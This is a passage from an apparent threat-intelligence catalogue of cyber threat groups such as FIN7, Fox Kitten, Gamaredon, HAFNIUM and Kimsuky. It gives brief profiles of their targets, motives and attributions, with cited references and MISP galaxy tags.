<sup>[[Sygnia Elephant Beetle Jan 2022](https://app.tidalcyber.com/references/932897a6-0fa4-5be3-bf0b-20d6ddad238e)]</sup>

The tag is: misp-galaxy:groups="Elephant Beetle - Associated Group"

FIN13

[FIN13](https://app.tidalcyber.com/groups/570198e3-b59c-5772-b1ee-15d7ea14d48a) is a financially motivated cyber threat group that has targeted the financial, retail, and hospitality industries in Mexico and Latin America, as early as 2016. [FIN13](https://app.tidalcyber.com/groups/570198e3-b59c-5772-b1ee-15d7ea14d48a) achieves its objectives by stealing intellectual property, financial data, mergers and acquisition information, or PII.<sup>[[Mandiant FIN13 Aug 2022](https://app.tidalcyber.com/references/ebd9d479-1954-5a4a-b7f0-d5372489733c)]</sup><sup>[[Sygnia Elephant Beetle Jan 2022](https://app.tidalcyber.com/references/932897a6-0fa4-5be3-bf0b-20d6ddad238e)]</sup>

The tag is: misp-galaxy:groups="FIN13"

FIN4

[FIN4](https://app.tidalcyber.com/groups/4b6531dc-5b29-4577-8b54-fa99229ab0ca) is a financially-motivated threat group that has targeted confidential information related to the public financial market, particularly regarding healthcare and pharmaceutical companies, since at least 2013.<sup>[[FireEye Hacking FIN4 Dec 2014](https://app.tidalcyber.com/references/c3ac1c2a-21cc-42a9-a214-88f302371766)]</sup><sup>[[FireEye FIN4 Stealing Insider NOV 2014](https://app.tidalcyber.com/references/b27f1040-46e5-411a-b238-0b40f6160680)]</sup> [FIN4](https://app.tidalcyber.com/groups/4b6531dc-5b29-4577-8b54-fa99229ab0ca) is unique in that they do not infect victims with typical persistent malware, but rather they focus on capturing credentials authorized to access email and other non-public correspondence.<sup>[[FireEye Hacking FIN4 Dec 2014](https://app.tidalcyber.com/references/c3ac1c2a-21cc-42a9-a214-88f302371766)]</sup><sup>[[FireEye Hacking FIN4 Video Dec 2014](https://app.tidalcyber.com/references/6dcfe3fb-c310-49cf-a657-f2cec65c5499)]</sup>

The tag is: misp-galaxy:groups="FIN4"

FIN5

[FIN5](https://app.tidalcyber.com/groups/7902f5cc-d6a5-4a57-8d54-4c75e0c58b83) is a financially motivated threat group that has targeted personally identifiable information and payment card information. The group has been active since at least 2008 and has targeted the restaurant, gaming, and hotel industries. The group is made up of actors who likely speak Russian. <sup>[[FireEye Respond Webinar July 2017](https://app.tidalcyber.com/references/e7091d66-7faa-49d6-b16f-be1f79db4471)]</sup> <sup>[[Mandiant FIN5 GrrCON Oct 2016](https://app.tidalcyber.com/references/2bd39baf-4223-4344-ba93-98aa8453dc11)]</sup> <sup>[[DarkReading FireEye FIN5 Oct 2015](https://app.tidalcyber.com/references/afe0549d-dc1b-4bcf-9a1d-55698afd530e)]</sup>

The tag is: misp-galaxy:groups="FIN5"

Skeleton Spider - Associated Group

<sup>[[Crowdstrike Global Threat Report Feb 2018](https://app.tidalcyber.com/references/6c1ace5b-66b2-4c56-9301-822aad2c3c16)]</sup>

The tag is: misp-galaxy:groups="Skeleton Spider - Associated Group"

Magecart Group 6 - Associated Group

<sup>[[Security Intelligence ITG08 April 2020](https://app.tidalcyber.com/references/32569f59-14fb-4581-8a42-3bf49fb189e9)]</sup>

The tag is: misp-galaxy:groups="Magecart Group 6 - Associated Group"

ITG08 - Associated Group

<sup>[[Security Intelligence More Eggs Aug 2019](https://app.tidalcyber.com/references/f0a0286f-adb9-4a6e-85b5-5b0f45e6fbf3)]</sup>

The tag is: misp-galaxy:groups="ITG08 - Associated Group"

FIN6

[FIN6](https://app.tidalcyber.com/groups/fcaadc12-7c17-4946-a9dc-976ed610854c) is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.<sup>[[FireEye FIN6 April 2016](https://app.tidalcyber.com/references/8c0997e1-b285-42dd-9492-75065eac8f8b)]</sup><sup>[[FireEye FIN6 Apr 2019](https://app.tidalcyber.com/references/e8a2bc6a-04e3-484e-af67-5f57656c7206)]</sup>

The tag is: misp-galaxy:groups="FIN6"

GOLD NIAGARA - Associated Group

<sup>[[Secureworks GOLD NIAGARA Threat Profile](https://app.tidalcyber.com/references/b11276cb-f6dd-4e91-90cd-9c287fb3e6b1)]</sup>

The tag is: misp-galaxy:groups="GOLD NIAGARA - Associated Group"

ITG14 - Associated Group

The tag is: misp-galaxy:groups="ITG14 - Associated Group"

Carbon Spider - Associated Group

<sup>[[CrowdStrike Carbon Spider August 2021](https://app.tidalcyber.com/references/36f0ddb0-94af-494c-ad10-9d3f75d1d810)]</sup>

The tag is: misp-galaxy:groups="Carbon Spider - Associated Group"

FIN7

[FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) is a financially-motivated threat group that has been active since 2013. [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) has primarily targeted the retail, restaurant, hospitality, software, consulting, financial services, medical equipment, cloud services, media, food and beverage, transportation, and utilities industries in the U.S. A portion of [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) was run out of a front company called Combi Security and often used point-of-sale malware for targeting efforts. Since 2020, [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) has shifted operations to a big game hunting (BGH) approach, including use of [REvil](https://app.tidalcyber.com/software/9314531e-bf46-4cba-9c19-198279ccf9cd) ransomware and their own Ransomware as a Service (RaaS), Darkside. FIN7 may be linked to the [Carbanak](https://app.tidalcyber.com/groups/72d9bea7-9ca1-43e6-8702-2fb7fb1355de) Group, but there appear to be several groups using [Carbanak](https://app.tidalcyber.com/software/4cb9294b-9e4c-41b9-b640-46213a01952d) malware, so they are tracked separately.<sup>[[FireEye FIN7 March 2017](https://app.tidalcyber.com/references/7987bb91-ec41-42f8-bd2d-dabc26509a08)]</sup><sup>[[FireEye FIN7 April 2017](https://app.tidalcyber.com/references/6ee27fdb-1753-4fdf-af72-3295b072ff10)]</sup><sup>[[FireEye CARBANAK June 2017](https://app.tidalcyber.com/references/39105492-6044-460c-9dc9-3d4473ee862e)]</sup><sup>[[FireEye FIN7 Aug 2018](https://app.tidalcyber.com/references/54e5f23a-5ca6-4feb-8046-db2fb71b400a)]</sup><sup>[[CrowdStrike Carbon Spider August 2021](https://app.tidalcyber.com/references/36f0ddb0-94af-494c-ad10-9d3f75d1d810)]</sup><sup>[[Mandiant FIN7 Apr 2022](https://app.tidalcyber.com/references/be9919c0-ca52-593b-aea0-c5e9a262b570)]</sup>

The tag is: misp-galaxy:groups="FIN7"

Syssphinx - Associated Group

The tag is: misp-galaxy:groups="Syssphinx - Associated Group"

FIN8

[FIN8](https://app.tidalcyber.com/groups/b3061284-0335-4dcb-9f8e-a3b0412fd46f) is a financially motivated threat group that has been active since at least January 2016, and known for targeting organizations in the hospitality, retail, entertainment, insurance, technology, chemical, and financial sectors. In June 2021, security researchers detected [FIN8](https://app.tidalcyber.com/groups/b3061284-0335-4dcb-9f8e-a3b0412fd46f) switching from targeting point-of-sale (POS) devices to distributing a number of ransomware variants.<sup>[[FireEye Obfuscation June 2017](https://app.tidalcyber.com/references/6d1089b7-0efe-4961-8abc-22a882895377)]</sup><sup>[[FireEye Fin8 May 2016](https://app.tidalcyber.com/references/2079101c-d988-430a-9082-d25c475b2af5)]</sup><sup>[[Bitdefender Sardonic Aug 2021](https://app.tidalcyber.com/references/8e9d05c9-6783-5738-ac85-a444810a8074)]</sup><sup>[[Symantec FIN8 Jul 2023](https://app.tidalcyber.com/references/9b08b7f0-1a33-5d76-817f-448fac0d165a)]</sup>

The tag is: misp-galaxy:groups="FIN8"

Pioneer Kitten - Associated Group

<sup>[[CrowdStrike PIONEER KITTEN August 2020](https://app.tidalcyber.com/references/4fce29cc-ddab-4b96-b295-83c282a87564)]</sup><sup>[[CISA AA20-259A Iran-Based Actor September 2020](https://app.tidalcyber.com/references/1bbc9446-9214-4fcd-bc7c-bf528370b4f8)]</sup>

The tag is: misp-galaxy:groups="Pioneer Kitten - Associated Group"

UNC757 - Associated Group

<sup>[[CISA AA20-259A Iran-Based Actor September 2020](https://app.tidalcyber.com/references/1bbc9446-9214-4fcd-bc7c-bf528370b4f8)]</sup><sup>[[CrowdStrike PIONEER KITTEN August 2020](https://app.tidalcyber.com/references/4fce29cc-ddab-4b96-b295-83c282a87564)]</sup>

The tag is: misp-galaxy:groups="UNC757 - Associated Group"

Parisite - Associated Group

The tag is: misp-galaxy:groups="Parisite - Associated Group"

Fox Kitten

[Fox Kitten](https://app.tidalcyber.com/groups/7094468a-2310-48b5-ad24-e669152bd66d) is a threat actor with a suspected nexus to the Iranian government that has been active since at least 2017 against entities in the Middle East, North Africa, Europe, Australia, and North America. [Fox Kitten](https://app.tidalcyber.com/groups/7094468a-2310-48b5-ad24-e669152bd66d) has targeted multiple industrial verticals including oil and gas, technology, government, defense, healthcare, manufacturing, and engineering.<sup>[[ClearkSky Fox Kitten February 2020](https://app.tidalcyber.com/references/a5ad6321-897a-4adc-9cdd-034a2538e3d6)]</sup><sup>[[CrowdStrike PIONEER KITTEN August 2020](https://app.tidalcyber.com/references/4fce29cc-ddab-4b96-b295-83c282a87564)]</sup><sup>[[Dragos PARISITE](https://app.tidalcyber.com/references/15e974db-51a9-4ec1-9725-cff8bb9bc2fa)]</sup><sup>[[ClearSky Pay2Kitten December 2020](https://app.tidalcyber.com/references/6e09bc1a-8a5d-4512-9176-40eed91af358)]</sup>

The tag is: misp-galaxy:groups="Fox Kitten"

Operation Soft Cell - Associated Group

The tag is: misp-galaxy:groups="Operation Soft Cell - Associated Group"

GALLIUM

[GALLIUM](https://app.tidalcyber.com/groups/15ff1ce0-44f0-4f1d-a4ef-83444570e572) is a cyberespionage group that has been active since at least 2012, primarily targeting telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam. Security researchers have identified [GALLIUM](https://app.tidalcyber.com/groups/15ff1ce0-44f0-4f1d-a4ef-83444570e572) as a likely Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.<sup>[[Cybereason Soft Cell June 2019](https://app.tidalcyber.com/references/620b7353-0e58-4503-b534-9250a8f5ae3c)]</sup><sup>[[Microsoft GALLIUM December 2019](https://app.tidalcyber.com/references/5bc76b47-ff68-4031-a347-f2dc0daba203)]</sup><sup>[[Unit 42 PingPull Jun 2022](https://app.tidalcyber.com/references/ac6491ab-6ef1-4091-8a15-50e2cbafe157)]</sup>

The tag is: misp-galaxy:groups="GALLIUM"

Gallmaker

[Gallmaker](https://app.tidalcyber.com/groups/cd483597-4eda-4e16-bb58-353488511410) is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017. The group has mainly targeted victims in the defense, military, and government sectors.<sup>[[Symantec Gallmaker Oct 2018](https://app.tidalcyber.com/references/f47b3e2b-acdd-4487-88b9-de5cbe45cf33)]</sup>

The tag is: misp-galaxy:groups="Gallmaker"

Primitive Bear - Associated Group

<sup>[[Unit 42 Gamaredon February 2022](https://app.tidalcyber.com/references/a5df39b2-77f8-4814-8198-8620655aa79b)]</sup>

The tag is: misp-galaxy:groups="Primitive Bear - Associated Group"

Shuckworm - Associated Group

<sup>[[Symantec Shuckworm January 2022](https://app.tidalcyber.com/references/3abb9cfb-8927-4447-b904-6ed071787bef)]</sup>

The tag is: misp-galaxy:groups="Shuckworm - Associated Group"

IRON TILDEN - Associated Group

<sup>[[Secureworks IRON TILDEN Profile](https://app.tidalcyber.com/references/45969d87-02c1-4074-b708-59f4c3e39426)]</sup>

The tag is: misp-galaxy:groups="IRON TILDEN - Associated Group"

ACTINIUM - Associated Group

<sup>[[Microsoft Actinium February 2022](https://app.tidalcyber.com/references/5ab658db-7f71-4213-8146-e22da54160b3)]</sup>

The tag is: misp-galaxy:groups="ACTINIUM - Associated Group"

Armageddon - Associated Group

<sup>[[Symantec Shuckworm January 2022](https://app.tidalcyber.com/references/3abb9cfb-8927-4447-b904-6ed071787bef)]</sup>

The tag is: misp-galaxy:groups="Armageddon - Associated Group"

DEV-0157 - Associated Group

<sup>[[Microsoft Actinium February 2022](https://app.tidalcyber.com/references/5ab658db-7f71-4213-8146-e22da54160b3)]</sup>

The tag is: misp-galaxy:groups="DEV-0157 - Associated Group"

Gamaredon Group

[Gamaredon Group](https://app.tidalcyber.com/groups/41e8b4a4-2d31-46ee-bc56-12375084d067) is a suspected Russian cyber espionage threat group that has targeted military, NGO, judiciary, law enforcement, and non-profit organizations in Ukraine since at least 2013. The name [Gamaredon Group](https://app.tidalcyber.com/groups/41e8b4a4-2d31-46ee-bc56-12375084d067) comes from a misspelling of the word "Armageddon", which was detected in the adversary’s early campaigns.<sup>[[Palo Alto Gamaredon Feb 2017](https://app.tidalcyber.com/references/3f9a6343-1db3-4696-99ed-f22c6eabee71)]</sup><sup>[[TrendMicro Gamaredon April 2020](https://app.tidalcyber.com/references/3800cfc2-0260-4b36-b629-7a336b9f9f10)]</sup><sup>[[ESET Gamaredon June 2020](https://app.tidalcyber.com/references/6532664d-2311-4b38-8960-f43762471729)]</sup><sup>[[Symantec Shuckworm January 2022](https://app.tidalcyber.com/references/3abb9cfb-8927-4447-b904-6ed071787bef)]</sup><sup>[[Microsoft Actinium February 2022](https://app.tidalcyber.com/references/5ab658db-7f71-4213-8146-e22da54160b3)]</sup>

In November 2021, the Ukrainian government publicly attributed [Gamaredon Group](https://app.tidalcyber.com/groups/41e8b4a4-2d31-46ee-bc56-12375084d067) to Russia’s Federal Security Service (FSB) Center 18.<sup>[[Bleepingcomputer Gamardeon FSB November 2021](https://app.tidalcyber.com/references/c565b025-df74-40a9-9535-b630ca06f777)]</sup><sup>[[Microsoft Actinium February 2022](https://app.tidalcyber.com/references/5ab658db-7f71-4213-8146-e22da54160b3)]</sup>

The tag is: misp-galaxy:groups="Gamaredon Group"

GCMAN

[GCMAN](https://app.tidalcyber.com/groups/dbc85db0-937d-47d7-9002-7364d41be48a) is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services. <sup>[[Securelist GCMAN](https://app.tidalcyber.com/references/1f07f234-50f0-4c1e-942a-a01d3f733161)]</sup>

The tag is: misp-galaxy:groups="GCMAN"

Pinchy Spider - Associated Group

<sup>[[CrowdStrike Evolution of Pinchy Spider July 2021](https://app.tidalcyber.com/references/7578541b-1ae3-58d0-a8b9-120bd6cd96f5)]</sup>

The tag is: misp-galaxy:groups="Pinchy Spider - Associated Group"

GOLD SOUTHFIELD

[GOLD SOUTHFIELD](https://app.tidalcyber.com/groups/b4d068ac-9b68-4cd8-bf0c-019f910ef8e3) is a financially motivated threat group active since at least 2018 that operates the [REvil](https://app.tidalcyber.com/software/9314531e-bf46-4cba-9c19-198279ccf9cd) Ransomware-as-a-Service (RaaS). [GOLD SOUTHFIELD](https://app.tidalcyber.com/groups/b4d068ac-9b68-4cd8-bf0c-019f910ef8e3) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments. By early 2020, [GOLD SOUTHFIELD](https://app.tidalcyber.com/groups/b4d068ac-9b68-4cd8-bf0c-019f910ef8e3) had started capitalizing on the then-new trend of stealing data and further extorting the victim to pay so that their data is not publicly leaked.<sup>[[Secureworks REvil September 2019](https://app.tidalcyber.com/references/8f4e2baf-4227-4bbd-bfdb-5598717dcf88)]</sup><sup>[[Secureworks GandCrab and REvil September 2019](https://app.tidalcyber.com/references/46b5d57b-17be-48ff-b723-406f6a55d84a)]</sup><sup>[[Secureworks GOLD SOUTHFIELD](https://app.tidalcyber.com/references/01d1ffaa-16b3-41c4-bb5a-afe2b41f1142)]</sup><sup>[[CrowdStrike Evolution of Pinchy Spider July 2021](https://app.tidalcyber.com/references/7578541b-1ae3-58d0-a8b9-120bd6cd96f5)]</sup>

The tag is: misp-galaxy:groups="GOLD SOUTHFIELD"

Gorgon Group

[Gorgon Group](https://app.tidalcyber.com/groups/efb3b5ac-cd86-44a2-9de1-02e4612b8cc2) is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. <sup>[[Unit 42 Gorgon Group Aug 2018](https://app.tidalcyber.com/references/d0605185-3f8d-4846-a718-15572714e15b)]</sup>

The tag is: misp-galaxy:groups="Gorgon Group"

Group5

[Group5](https://app.tidalcyber.com/groups/fcc6d937-8cd6-4f2c-adb8-48caedbde70a) is a threat group with a suspected Iranian nexus, though this attribution is not definite. The group has targeted individuals connected to the Syrian opposition via spearphishing and watering holes, normally using Syrian and Iranian themes. [Group5](https://app.tidalcyber.com/groups/fcc6d937-8cd6-4f2c-adb8-48caedbde70a) has used two commonly available remote access tools (RATs), [njRAT](https://app.tidalcyber.com/software/82996f6f-0575-45cd-8f7c-ba1b063d5b9f) and [NanoCore](https://app.tidalcyber.com/software/db05dbaa-eb3a-4303-b37e-18d67e7e85a1), as well as an Android RAT, DroidJack. <sup>[[Citizen Lab Group5](https://app.tidalcyber.com/references/ffbec5e8-947a-4363-b7e1-812dfd79935a)]</sup>

The tag is: misp-galaxy:groups="Group5"

Operation Exchange Marauder - Associated Group

<sup>[[Volexity Exchange Marauder March 2021](https://app.tidalcyber.com/references/ef0626e9-281c-4770-b145-ffe36e18e369)]</sup>

The tag is: misp-galaxy:groups="Operation Exchange Marauder - Associated Group"

HAFNIUM

[HAFNIUM](https://app.tidalcyber.com/groups/1bcc9382-ccfe-4b04-91f3-ef1250df5e5b) is a likely state-sponsored cyber espionage group operating out of China that has been active since at least January 2021. [HAFNIUM](https://app.tidalcyber.com/groups/1bcc9382-ccfe-4b04-91f3-ef1250df5e5b) primarily targets entities in the US across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.<sup>[[Microsoft HAFNIUM March 2020](https://app.tidalcyber.com/references/6a986c46-79a3-49c6-94d2-d9b1f5db08f3)]</sup><sup>[[Volexity Exchange Marauder March 2021](https://app.tidalcyber.com/references/ef0626e9-281c-4770-b145-ffe36e18e369)]</sup>

The tag is: misp-galaxy:groups="HAFNIUM"

Lyceum - Associated Group

The tag is: misp-galaxy:groups="Lyceum - Associated Group"

Siamesekitten - Associated Group

<sup>[[ClearSky Siamesekitten August 2021](https://app.tidalcyber.com/references/9485efce-8d54-4461-b64e-0d15e31fbf8c)]</sup>

The tag is: misp-galaxy:groups="Siamesekitten - Associated Group"

Spirlin - Associated Group

<sup>[[Accenture Lyceum Targets November 2021](https://app.tidalcyber.com/references/127836ce-e459-405d-a75c-32fd5f0ab198)]</sup>

The tag is: misp-galaxy:groups="Spirlin - Associated Group"

HEXANE

[HEXANE](https://app.tidalcyber.com/groups/eecf7289-294f-48dd-a747-7705820f4735) is a cyber espionage threat group that has targeted oil & gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. [HEXANE](https://app.tidalcyber.com/groups/eecf7289-294f-48dd-a747-7705820f4735)'s TTPs appear similar to [APT33](https://app.tidalcyber.com/groups/99bbbe25-45af-492f-a7ff-7cbc57828bac) and [OilRig](https://app.tidalcyber.com/groups/d01abdb1-0378-4654-aa38-1a4a292703e2) but due to differences in victims and tools it is tracked as a separate entity.<sup>[[Dragos Hexane](https://app.tidalcyber.com/references/11838e67-5032-4352-ad1f-81ba0398a14f)]</sup><sup>[[Kaspersky Lyceum October 2021](https://app.tidalcyber.com/references/b3d13a82-c24e-4b47-b47a-7221ad449859)]</sup><sup>[[ClearSky Siamesekitten August 2021](https://app.tidalcyber.com/references/9485efce-8d54-4461-b64e-0d15e31fbf8c)]</sup><sup>[[Accenture Lyceum Targets November 2021](https://app.tidalcyber.com/references/127836ce-e459-405d-a75c-32fd5f0ab198)]</sup>

The tag is: misp-galaxy:groups="HEXANE"

Higaisa

[Higaisa](https://app.tidalcyber.com/groups/f1477581-d485-403f-a95f-c56bf88c5d1e) is a threat group suspected to have South Korean origins. [Higaisa](https://app.tidalcyber.com/groups/f1477581-d485-403f-a95f-c56bf88c5d1e) has targeted government, public, and trade organizations in North Korea; however, they have also carried out attacks in China, Japan, Russia, Poland, and other nations. [Higaisa](https://app.tidalcyber.com/groups/f1477581-d485-403f-a95f-c56bf88c5d1e) was first disclosed in early 2019 but is assessed to have operated as early as 2009.<sup>[[Malwarebytes Higaisa 2020](https://app.tidalcyber.com/references/6054e0ab-cf61-49ba-b7f5-58b304477451)]</sup><sup>[[Zscaler Higaisa 2020](https://app.tidalcyber.com/references/26d7ee2c-d4f7-441a-9073-49c9049b017e)]</sup><sup>[[PTSecurity Higaisa 2020](https://app.tidalcyber.com/references/cf8f3d9c-0d21-4587-a707-46848a15bd46)]</sup>

The tag is: misp-galaxy:groups="Higaisa"

Inception Framework - Associated Group

<sup>[[Symantec Inception Framework March 2018](https://app.tidalcyber.com/references/166f5c44-7d8c-45d5-8d9f-3b8bd21a2af3)]</sup>

The tag is: misp-galaxy:groups="Inception Framework - Associated Group"

Cloud Atlas - Associated Group

<sup>[[Kaspersky Cloud Atlas December 2014](https://app.tidalcyber.com/references/41a9b3e3-0953-4bde-9e1d-c2f51de1120e)]</sup>

The tag is: misp-galaxy:groups="Cloud Atlas - Associated Group"

Inception

[Inception](https://app.tidalcyber.com/groups/d7c58e7f-f0b0-44c6-b205-5adcfb56f0e6) is a cyber espionage group active since at least 2014. The group has targeted multiple industries and governmental entities primarily in Russia, but has also been active in the United States and throughout Europe, Asia, Africa, and the Middle East.<sup>[[Unit 42 Inception November 2018](https://app.tidalcyber.com/references/5cb98fce-f386-4878-b69c-5c6440ad689c)]</sup><sup>[[Symantec Inception Framework March 2018](https://app.tidalcyber.com/references/166f5c44-7d8c-45d5-8d9f-3b8bd21a2af3)]</sup><sup>[[Kaspersky Cloud Atlas December 2014](https://app.tidalcyber.com/references/41a9b3e3-0953-4bde-9e1d-c2f51de1120e)]</sup>

The tag is: misp-galaxy:groups="Inception"

IndigoZebra

[IndigoZebra](https://app.tidalcyber.com/groups/988f5312-834e-48ea-93b7-e6e01ee0938d) is a suspected Chinese cyber espionage group that has been targeting Central Asian governments since at least 2014.<sup>[[HackerNews IndigoZebra July 2021](https://app.tidalcyber.com/references/fcf8265a-3084-4162-87d0-9e77c0a5cff0)]</sup><sup>[[Checkpoint IndigoZebra July 2021](https://app.tidalcyber.com/references/cf4a8c8c-eab1-421f-b313-344aed03b42d)]</sup><sup>[[Securelist APT Trends Q2 2017](https://app.tidalcyber.com/references/fe28042c-d289-463f-9ece-1a75a70b966e)]</sup>

The tag is: misp-galaxy:groups="IndigoZebra"

Evil Corp - Associated Group

The tag is: misp-galaxy:groups="Evil Corp - Associated Group"

Indrik Spider

[Indrik Spider](https://app.tidalcyber.com/groups/3c7ad595-1940-40fc-b9ca-3e649c1e5d87) is a Russia-based cybercriminal group that has been active since at least 2014. [Indrik Spider](https://app.tidalcyber.com/groups/3c7ad595-1940-40fc-b9ca-3e649c1e5d87) initially started with the [Dridex](https://app.tidalcyber.com/software/e3cd4405-b698-41d9-88e4-fff29e7a19e2) banking Trojan, and then by 2017 they began running ransomware operations using [BitPaymer](https://app.tidalcyber.com/software/e7dec940-8701-4c06-9865-5b11c61c046d), [WastedLocker](https://app.tidalcyber.com/software/0ba6ee8d-2b29-4980-8e55-348ea05f00ad), and Hades ransomware. Following U.S. sanctions and an indictment in 2019, [Indrik Spider](https://app.tidalcyber.com/groups/3c7ad595-1940-40fc-b9ca-3e649c1e5d87) changed their tactics and diversified their toolset.<sup>[[Crowdstrike Indrik November 2018](https://app.tidalcyber.com/references/0f85f611-90db-43ba-8b71-5d0d4ec8cdd5)]</sup><sup>[[Crowdstrike EvilCorp March 2021](https://app.tidalcyber.com/references/4b77d313-ef3c-4d2f-bfde-609fa59a8f55)]</sup><sup>[[Treasury EvilCorp Dec 2019](https://app.tidalcyber.com/references/074a52c4-26d9-4083-9349-c14e2639c1bc)]</sup>

The tag is: misp-galaxy:groups="Indrik Spider"

Vixen Panda - Associated Group

The tag is: misp-galaxy:groups="Vixen Panda - Associated Group"

Playful Dragon - Associated Group

The tag is: misp-galaxy:groups="Playful Dragon - Associated Group"

APT15 - Associated Group

<sup>[[NCC Group APT15 Alive and Strong](https://app.tidalcyber.com/references/02a50445-de06-40ab-9ea4-da5c37e066cd)]</sup>

The tag is: misp-galaxy:groups="APT15 - Associated Group"

Mirage - Associated Group

<sup>[[NCC Group APT15 Alive and Strong](https://app.tidalcyber.com/references/02a50445-de06-40ab-9ea4-da5c37e066cd)]</sup>

The tag is: misp-galaxy:groups="Mirage - Associated Group"

GREF - Associated Group

<sup>[[NCC Group APT15 Alive and Strong](https://app.tidalcyber.com/references/02a50445-de06-40ab-9ea4-da5c37e066cd)]</sup>

The tag is: misp-galaxy:groups="GREF - Associated Group"

RoyalAPT - Associated Group

The tag is: misp-galaxy:groups="RoyalAPT - Associated Group"

NICKEL - Associated Group

The tag is: misp-galaxy:groups="NICKEL - Associated Group"

Ke3chang

[Ke3chang](https://app.tidalcyber.com/groups/26c0925f-1a3c-4df6-b27a-62b9731299b8) is a threat group attributed to actors operating out of China. [Ke3chang](https://app.tidalcyber.com/groups/26c0925f-1a3c-4df6-b27a-62b9731299b8) has targeted organizations in the oil, government, diplomatic, military, and NGO sectors in Central and South America, the Caribbean, Europe, and North America since at least 2010.<sup>[[Mandiant Operation Ke3chang November 2014](https://app.tidalcyber.com/references/bb45cf96-ceae-4f46-a0f5-08cd89f699c9)]</sup><sup>[[NCC Group APT15 Alive and Strong](https://app.tidalcyber.com/references/02a50445-de06-40ab-9ea4-da5c37e066cd)]</sup><sup>[[APT15 Intezer June 2018](https://app.tidalcyber.com/references/0110500c-bf67-43a5-97cb-16eb6c01040b)]</sup><sup>[[Microsoft NICKEL December 2021](https://app.tidalcyber.com/references/29a46bb3-f514-4554-ad9c-35f9a5ad9870)]</sup>

The tag is: misp-galaxy:groups="Ke3chang"

Killnet

Killnet is an apparent hacktivist collective that has primarily used distributed denial of service (DDoS) attacks in support of its ideology, which appears to largely align with Russian state interests. The group emerged in October 2021, initially offering DDoS capabilities as a for-hire service. However, after the February 2022 Russian invasion of Ukraine, Killnet explicitly pledged allegiance to Russia and began to threaten and claim responsibility for attacks on targets in Ukraine and in countries perceived to support Ukraine. To date, the group has claimed and is believed to be responsible for a considerable number of DDoS attacks on government and private sector targets in a range of sectors, using a variety of discrete techniques to carry them out. It is also believed to be behind a smaller number of data exfiltration-focused attacks, and it has promoted the use of defacement tools in its communication channels with supporters.<sup>[[Flashpoint Glossary Killnet](/references/502cc03b-350b-4e2d-9436-364c43a0a203)]</sup>

In October 2023, following a series of air- and land-based attacks in the Gaza Strip, researchers observed Killnet claiming responsibility for disruptive attacks against computer networks in Israel and pledging explicit support for Palestinian interests.<sup>[[RyanW3stman Tweet October 10 2023](/references/cfd0ad64-54b2-446f-9624-9c90a9a94f52)]</sup>

The tag is: misp-galaxy:groups="Killnet"

STOLEN PENCIL - Associated Group

<sup>[[Netscout Stolen Pencil Dec 2018](https://app.tidalcyber.com/references/6d3b31da-a784-4da0-91dd-b72c04fd520a)]</sup>

The tag is: misp-galaxy:groups="STOLEN PENCIL - Associated Group"

Thallium - Associated Group

The tag is: misp-galaxy:groups="Thallium - Associated Group"

Black Banshee - Associated Group

The tag is: misp-galaxy:groups="Black Banshee - Associated Group"

Velvet Chollima - Associated Group

The tag is: misp-galaxy:groups="Velvet Chollima - Associated Group"

Kimsuky

[Kimsuky](https://app.tidalcyber.com/groups/37f317d8-02f0-43d4-8a7d-7a65ce8aadf1) is a North Korea-based cyber espionage group that has been active since at least 2012. The group initially focused on targeting South Korean government entities, think tanks, and individuals identified as experts in various fields, and expanded its operations to include the United States, Russia, Europe, and the UN. [Kimsuky](https://app.tidalcyber.com/groups/37f317d8-02f0-43d4-8a7d-7a65ce8aadf1) has focused its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.<sup>[[EST Kimsuky April 2019](https://app.tidalcyber.com/references/8e52db6b-5ac3-448a-93f6-96a21787a346)]</sup><sup>[[BRI Kimsuky April 2019](https://app.tidalcyber.com/references/b72dd3a1-62ca-4a05-96a8-c4bddb17db50)]</sup><sup>[[Cybereason Kimsuky November 2020](https://app.tidalcyber.com/references/ecc2f5ad-b2a8-470b-b919-cb184d12d00f)]</sup><sup>[[Malwarebytes Kimsuky June 2021](https://app.tidalcyber.com/references/9a497c56-f1d3-4889-8c1a-14b013f14668)]</sup><sup>[[CISA AA20-301A Kimsuky](https://app.tidalcyber.com/references/685aa213-7902-46fb-b90a-64be5c851f73)]</sup>

[Kimsuky](https://app.tidalcyber.com/groups/37f317d8-02f0-43d4-8a7d-7a65ce8aadf1) was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).<sup>[[Netscout Stolen Pencil Dec 2018](https://app.tidalcyber.com/references/6d3b31da-a784-4da0-91dd-b72c04fd520a)]</sup><sup>[[EST Kimsuky SmokeScreen April 2019](https://app.tidalcyber.com/references/15213a3c-1e9f-47fa-9864-8ef2707c7fb6)]</sup><sup>[[AhnLab Kimsuky Kabar Cobra Feb 2019](https://app.tidalcyber.com/references/4035e871-9291-4d7f-9c5f-d8482d4dc8a7)]</sup>

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) instead of tracking clusters or subgroups.

The tag is: misp-galaxy:groups="Kimsuky"

DEV-0537 - Associated Group

The tag is: misp-galaxy:groups="DEV-0537 - Associated Group"

LAPSUS$

